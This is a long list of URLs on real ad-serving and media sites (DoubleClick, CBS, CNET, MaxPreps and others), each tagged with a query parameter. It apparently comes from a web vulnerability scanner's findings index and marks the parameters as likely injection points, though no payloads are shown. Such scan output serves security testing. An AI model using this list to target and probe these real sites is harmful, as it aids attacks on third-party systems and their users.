http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [e parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [epartner parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [event parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [h parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [l parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [nd parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [o parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [oepartner parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [orh parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [p parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [pdom parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [pg parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [pid parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [pp parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [ppartner parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [pt parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [ra parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [rqid parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [sg parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [site parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [sz parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [t parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [b parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [cid parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [count parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [e parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [epartner parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [event parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [h parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [l parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [nd parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [o parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [oepartner parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [orh parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [p parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pdom parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pg parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pid parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pp parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [ppartner parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pt parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [ra parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [rqid parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [sg parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [site parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [sz parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [t parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [b parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [cid parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [count parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [e parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [epartner parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [event parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [h parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [l parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [nd parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [o parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [oepartner parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [orh parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [p parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pdom parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pg parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pid parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pp parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [ppartner parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pt parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [ra parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [rqid parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [sg parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [site parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [sz parameter]
http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [t parameter]
http://ad.doubleclick.net/adj/CBS.LASTFM.US/anonymoushome/anonymoushome/overview [source parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [b parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [b parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [cid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [cid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [count parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [count parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [cpnmodule parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [cpnmodule parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [e parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [e parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [epartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [epartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [event parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [event parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [h parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [h parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [l parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [l parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [nd parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [nd parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [o parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [o parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [oepartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [oepartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [orh parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [orh parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [p parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [p parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pdom parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pdom parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pg parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pg parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pp parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pp parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [ppartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [ppartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pt parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pt parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [ra parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [ra parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [rqid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [rqid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [sg parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [sg parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [site parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [site parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [sz parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [sz parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [t parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [t parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [b parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [b parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [cid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [cid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [count parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [count parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [cpnmodule parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [cpnmodule parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [e parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [e parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [epartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [epartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [event parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [event parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [h parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [h parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [l parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [l parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [nd parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [nd parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [o parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [o parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [oepartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [oepartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [orh parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [orh parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [p parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [p parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pdom parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pdom parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pg parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pg parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pp parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pp parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [ppartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [ppartner parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pt parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pt parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [ra parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [ra parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [rqid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [rqid parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [sg parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [sg parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [site parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [site parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [sz parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [sz parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [t parameter]
http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [t parameter]
http://adimg.tv.com/mac-ad [&&&&&&&&adfile parameter]
http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]
http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]
http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]
http://admeld.adnxs.com/usersync [admeld_callback parameter]
http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]
http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]
http://apex.com.com/aws/rest/v1.0/arrowUser [callback parameter]
http://api.cnet.com/restApi/v1.0/videoSearch [callback parameter]
http://b.scorecardresearch.com/beacon.js [c1 parameter]
http://b.scorecardresearch.com/beacon.js [c2 parameter]
http://b.scorecardresearch.com/beacon.js [c3 parameter]
http://b.scorecardresearch.com/beacon.js [c4 parameter]
http://b.scorecardresearch.com/beacon.js [c5 parameter]
http://b.scorecardresearch.com/beacon.js [c6 parameter]
http://cdn.widgetserver.com/syndication/json/i/cc396f99-ff24-4e7b-bd0c-32d96c3767c8/iv/5/p/3/r/e8cf8788-6b03-4c0c-8d03-44a859eb3751/rv/36/t/30b2593ec7bf2492f0b9d19e64b204a8e259fcf60000012f98d80b21/u/3/ [REST URL parameter 14]
http://cdn.widgetserver.com/syndication/json/i/cc396f99-ff24-4e7b-bd0c-32d96c3767c8/iv/5/p/3/r/e8cf8788-6b03-4c0c-8d03-44a859eb3751/rv/36/t/30b2593ec7bf2492f0b9d19e64b204a8e259fcf60000012f98d80b21/u/3/ [REST URL parameter 4]
http://cdn.widgetserver.com/syndication/xml/i/54b05723-2d57-4335-b0fe-2a325ee46ece/iv/27/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/465/t/24a959472d426540cf6e325aebfb47c99af45bcf0000012f988ee669/u/3/ [REST URL parameter 18]
http://cdn.widgetserver.com/syndication/xml/i/54b05723-2d57-4335-b0fe-2a325ee46ece/iv/27/n/code/nv/4/p/2/r/3e9af2de-ad31-438b-a809-221776504656/rv/465/t/24a959472d426540cf6e325aebfb47c99af45bcf0000012f988ee669/u/3/ [REST URL parameter 4]
http://dealnews.com/lw/log_syndication.php [REST URL parameter 1]
http://dealnews.com/synd/2.1/widget.php [REST URL parameter 1]
http://dealnews.com/synd/2.1/widget.php [REST URL parameter 2]
http://dealnews.com/synd/2.1/widget.php [REST URL parameter 3]
http://domainhelp.search.com/search [d parameter]
http://domainhelp.search.com/search [d parameter]
http://domainhelp.search.com/search [d parameter]
http://domainhelp.search.com/search [q parameter]
http://finance.bnet.com/bnet [Module parameter]
http://finance.bnet.com/bnet [REST URL parameter 1]
http://finance.bnet.com/bnet [name of an arbitrarily supplied request parameter]
http://flash.quantserve.com/quant.swf [lc parameter]
http://img.mediaplex.com/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html [mpck parameter]
http://img.mediaplex.com/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html [mpck parameter]
http://img.mediaplex.com/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html [mpck parameter]
http://img.mediaplex.com/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html [mpvc parameter]
http://img.mediaplex.com/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html [mpvc parameter]
http://img.mediaplex.com/content/0/12309/125186/1352531_CON_120106_SYS_PRINTER_V515V_BA_300x250.html [mpvc parameter]
http://init.zopim.com/register [mID parameter]
http://js.revsci.net/gateway/gw.js [csid parameter]
http://linkdr.net/ [name of an arbitrarily supplied request parameter]
http://linkdr.net/favicon.ico [REST URL parameter 1]
http://linkdr.net/favicon.ico [name of an arbitrarily supplied request parameter]
http://mads.bnet.com/mac-ad [ADREQ&beacon parameter]
http://mads.bnet.com/mac-ad [CELT parameter]
http://mads.bnet.com/mac-ad [CID parameter]
http://mads.bnet.com/mac-ad [COOKIE%3AANON_ID parameter]
http://mads.bnet.com/mac-ad [DVAR_INSTLANG parameter]
http://mads.bnet.com/mac-ad [GLOBAL&CLIENT:ID parameter]
http://mads.bnet.com/mac-ad [IREFER_HOST parameter]
http://mads.bnet.com/mac-ad [NCAT parameter]
http://mads.bnet.com/mac-ad [PAGESTATE parameter]
http://mads.bnet.com/mac-ad [PAGESTATE parameter]
http://mads.bnet.com/mac-ad [PTYPE parameter]
http://mads.bnet.com/mac-ad [SITE parameter]
http://mads.bnet.com/mac-ad [cookiesOn parameter]
http://mads.bnet.com/mac-ad [name of an arbitrarily supplied request parameter]
http://mads.bnet.com/mac-ad [x-cb parameter]
http://mads.cbs.com/mac-ad [ADREQ&SP parameter]
http://mads.cbs.com/mac-ad [ADREQ&beacon parameter]
http://mads.cbs.com/mac-ad [BRAND parameter]
http://mads.cbs.com/mac-ad [BRAND parameter]
http://mads.cbs.com/mac-ad [CELT parameter]
http://mads.cbs.com/mac-ad [COOKIE%3AANON_ID parameter]
http://mads.cbs.com/mac-ad [DVAR_GENRE parameter]
http://mads.cbs.com/mac-ad [DVAR_INSTLANG parameter]
http://mads.cbs.com/mac-ad [DVAR_SESSION parameter]
http://mads.cbs.com/mac-ad [GLOBAL&CLIENT:ID parameter]
http://mads.cbs.com/mac-ad [GLOBAL&CLIENT:ID parameter]
http://mads.cbs.com/mac-ad [NCAT parameter]
http://mads.cbs.com/mac-ad [NCAT parameter]
http://mads.cbs.com/mac-ad [NODE parameter]
http://mads.cbs.com/mac-ad [PAGESTATE parameter]
http://mads.cbs.com/mac-ad [PAGESTATE parameter]
http://mads.cbs.com/mac-ad [POS parameter]
http://mads.cbs.com/mac-ad [PTYPE parameter]
http://mads.cbs.com/mac-ad [PTYPE parameter]
http://mads.cbs.com/mac-ad [SITE parameter]
http://mads.cbs.com/mac-ad [SITE parameter]
http://mads.cbs.com/mac-ad [cookiesOn parameter]
http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]
http://mads.cbs.com/mac-ad [x-cb parameter]
http://mads.cbsnews.com/mac-ad [ADREQ&SP parameter]
http://mads.cbsnews.com/mac-ad [ADREQ&SP parameter]
http://mads.cbsnews.com/mac-ad [ADREQ&beacon parameter]
http://mads.cbsnews.com/mac-ad [ADREQ&beacon parameter]
http://mads.cbsnews.com/mac-ad [BRAND parameter]
http://mads.cbsnews.com/mac-ad [BRAND parameter]
http://mads.cbsnews.com/mac-ad [BRAND parameter]
http://mads.cbsnews.com/mac-ad [CELT parameter]
http://mads.cbsnews.com/mac-ad [CID parameter]
http://mads.cbsnews.com/mac-ad [CID parameter]
http://mads.cbsnews.com/mac-ad [CNET-PAGE-GUID parameter]
http://mads.cbsnews.com/mac-ad [CNET-PAGE-GUID parameter]
http://mads.cbsnews.com/mac-ad [COOKIE%3AANON_ID parameter]
http://mads.cbsnews.com/mac-ad [COOKIE%3AANON_ID parameter]
http://mads.cbsnews.com/mac-ad [DVAR_CID parameter]
http://mads.cbsnews.com/mac-ad [DVAR_CID parameter]
http://mads.cbsnews.com/mac-ad [DVAR_INSTLANG parameter]
http://mads.cbsnews.com/mac-ad [DVAR_INSTLANG parameter]
http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]
http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]
http://mads.cbsnews.com/mac-ad [IREFER_HOST parameter]
http://mads.cbsnews.com/mac-ad [IREFER_HOST parameter]
http://mads.cbsnews.com/mac-ad [NCAT parameter]
http://mads.cbsnews.com/mac-ad [NCAT parameter]
http://mads.cbsnews.com/mac-ad [NODE parameter]
http://mads.cbsnews.com/mac-ad [NODE parameter]
http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]
http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]
http://mads.cbsnews.com/mac-ad [POS parameter]
http://mads.cbsnews.com/mac-ad [POS parameter]
http://mads.cbsnews.com/mac-ad [PTYPE parameter]
http://mads.cbsnews.com/mac-ad [PTYPE parameter]
http://mads.cbsnews.com/mac-ad [SITE parameter]
http://mads.cbsnews.com/mac-ad [SITE parameter]
http://mads.cbsnews.com/mac-ad [cookiesOn parameter]
http://mads.cbsnews.com/mac-ad [cookiesOn parameter]
http://mads.cbsnews.com/mac-ad [name of an arbitrarily supplied request parameter]
http://mads.cbsnews.com/mac-ad [name of an arbitrarily supplied request parameter]
http://mads.cbsnews.com/mac-ad [x-cb parameter]
http://mads.cbsnews.com/mac-ad [x-cb parameter]
http://mads.cbssports.com/mac-ad [ADREQ&SP parameter]
http://mads.cbssports.com/mac-ad [ADREQ&beacon parameter]
http://mads.cbssports.com/mac-ad [BRAND parameter]
http://mads.cbssports.com/mac-ad [BRAND parameter]
http://mads.cbssports.com/mac-ad [BRAND parameter]
http://mads.cbssports.com/mac-ad [BRAND parameter]
http://mads.cbssports.com/mac-ad [CELT parameter]
http://mads.cbssports.com/mac-ad [COOKIE%3AANON_ID parameter]
http://mads.cbssports.com/mac-ad [COOKIE%3AANON_ID parameter]
http://mads.cbssports.com/mac-ad [DVAR_EXCLUDE parameter]
http://mads.cbssports.com/mac-ad [DVAR_INSTLANG parameter]
http://mads.cbssports.com/mac-ad [DVAR_INSTLANG parameter]
http://mads.cbssports.com/mac-ad [DVAR_SESSION parameter]
http://mads.cbssports.com/mac-ad [DVAR_SESSION parameter]
http://mads.cbssports.com/mac-ad [DVAR_SUBSESSION parameter]
http://mads.cbssports.com/mac-ad [DVAR_SUBSESSION parameter]
http://mads.cbssports.com/mac-ad [DVAR_USER parameter]
http://mads.cbssports.com/mac-ad [DVAR_USER parameter]
http://mads.cbssports.com/mac-ad [GLOBAL&CLIENT:ID parameter]
http://mads.cbssports.com/mac-ad [GLOBAL&CLIENT:ID parameter]
http://mads.cbssports.com/mac-ad [IREFER_HOST parameter]
http://mads.cbssports.com/mac-ad [META&ADSEPARATOR parameter]
http://mads.cbssports.com/mac-ad [NCAT parameter]
http://mads.cbssports.com/mac-ad [NCAT parameter]
http://mads.cbssports.com/mac-ad [NODE parameter]
http://mads.cbssports.com/mac-ad [NODE parameter]
http://mads.cbssports.com/mac-ad [PAGESTATE parameter]
http://mads.cbssports.com/mac-ad [PAGESTATE parameter]
http://mads.cbssports.com/mac-ad [PGUID parameter]
http://mads.cbssports.com/mac-ad [PGUID parameter]
http://mads.cbssports.com/mac-ad [POS parameter]
http://mads.cbssports.com/mac-ad [PTYPE parameter]
http://mads.cbssports.com/mac-ad [SITE parameter]
http://mads.cbssports.com/mac-ad [adfile parameter]
http://mads.cbssports.com/mac-ad [celt parameter]
http://mads.cbssports.com/mac-ad [cookiesOn parameter]
http://mads.cbssports.com/mac-ad [cookiesOn parameter]
http://mads.cbssports.com/mac-ad [has_takeover parameter]
http://mads.cbssports.com/mac-ad [name of an arbitrarily supplied request parameter]
http://mads.cbssports.com/mac-ad [name of an arbitrarily supplied request parameter]
http://mads.cbssports.com/mac-ad [x-cb parameter]
http://mads.cbssports.com/mac-ad [x-cb parameter]
http://mads.cnet.com/mac-ad [&&&&&&adfile parameter]
http://mads.cnet.com/mac-ad [&adfile parameter]
http://mads.cnet.com/mac-ad [ADREQ&beacon parameter]
http://mads.cnet.com/mac-ad [BRAND parameter]
http://mads.cnet.com/mac-ad [BRAND parameter]
http://mads.cnet.com/mac-ad [BRAND parameter]
http://mads.cnet.com/mac-ad [BRAND parameter]
http://mads.cnet.com/mac-ad [CELT parameter]
http://mads.cnet.com/mac-ad [OVERGIF parameter]
http://mads.cnet.com/mac-ad [PAGESTATE parameter]
http://mads.cnet.com/mac-ad [SITE parameter]
http://mads.cnet.com/mac-ad [SITE parameter]
http://mads.cnet.com/mac-ad [SITE parameter]
http://mads.cnet.com/mac-ad [_RGROUP parameter]
http://mads.gamespot.com/mac-ad [ADREQ&beacon parameter]
http://mads.gamespot.com/mac-ad [PAGESTATE parameter]
http://mads.gamespot.com/mac-ad [SITE parameter]
http://mads.maxpreps.com/mac-ad [BRAND parameter]
http://mads.maxpreps.com/mac-ad [BRAND parameter]
http://mads.maxpreps.com/mac-ad [CLIENT:ID parameter]
http://mads.maxpreps.com/mac-ad [DVAR_FIRSTPAGE parameter]
http://mads.maxpreps.com/mac-ad [DVAR_SESSION parameter]
http://mads.maxpreps.com/mac-ad [NCAT parameter]
http://mads.maxpreps.com/mac-ad [NCAT parameter]
http://mads.maxpreps.com/mac-ad [PAGESTATE parameter]
http://mads.maxpreps.com/mac-ad [PAGESTATE parameter]
http://mads.maxpreps.com/mac-ad [POS parameter]
http://mads.maxpreps.com/mac-ad [POS parameter]
http://mads.maxpreps.com/mac-ad [PTYPE parameter]
http://mads.maxpreps.com/mac-ad [SITE parameter]
http://mads.maxpreps.com/mac-ad [SITE parameter]
http://mads.maxpreps.com/mac-ad [SP parameter]
http://mads.maxpreps.com/mac-ad [SP parameter]
http://mads.maxpreps.com/mac-ad [celt parameter]
http://mads.maxpreps.com/mac-ad [cookiesOn parameter]
http://mads.maxpreps.com/mac-ad [name of an arbitrarily supplied request parameter]
http://mads.maxpreps.com/mac-ad [x-cb parameter]
http://mads.metacritic.com/mac-ad [ADREQ&beacon parameter]
http://mads.metacritic.com/mac-ad [PAGESTATE parameter]
http://mads.metacritic.com/mac-ad [SITE parameter]
http://mads.mysimon.com/mac-ad [ADREQ&beacon parameter]
http://mads.mysimon.com/mac-ad [PAGESTATE parameter]
http://mads.mysimon.com/mac-ad [SITE parameter]
http://mads.tv.com/mac-ad [ADREQ&beacon parameter]
http://mads.tv.com/mac-ad [PAGESTATE parameter]
http://mads.tv.com/mac-ad [SITE parameter]
http://mads.urbanbaby.com/mac-ad [ADREQ&beacon parameter]
http://mads.urbanbaby.com/mac-ad [BRAND parameter]
http://mads.urbanbaby.com/mac-ad [CELT parameter]
http://mads.urbanbaby.com/mac-ad [PAGESTATE parameter]
http://mads.urbanbaby.com/mac-ad [SITE parameter]
http://mads.urbanbaby.com/mac-ad [SITE parameter]
http://mads.urbanbaby.com/mac-ad [SITE parameter]
http://mads.urbanbaby.com/mac-ad [SITE parameter]
http://mads.urbanbaby.com/mac-ad [_RGROUP parameter]
http://mads.urbanbaby.com/mac-ad [beacon parameter]
http://mads.urbanbaby.com/mac-ad [site parameter]
http://nmp.newsgator.com/NGBuzz//buzz.ashx [_dsrId parameter]
http://nmp.newsgator.com/NGBuzz//gateway.ashx/ngdsr/ [_dsrId parameter]
http://nmp.newsgator.com/NGBuzz/buzz.ashx [_dsrId parameter]
http://nmp.newsgator.com/NGBuzz/buzz.ashx [buzzId parameter]
http://nmp.newsgator.com/ngbuzz//buzz.ashx [buzzId parameter]
http://nmp.newsgator.com/ngbuzz//buzz.ashx [name of an arbitrarily supplied request parameter]
http://offers-service.cbsinteractive.com/offers/script.sc [offerId parameter]
http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]
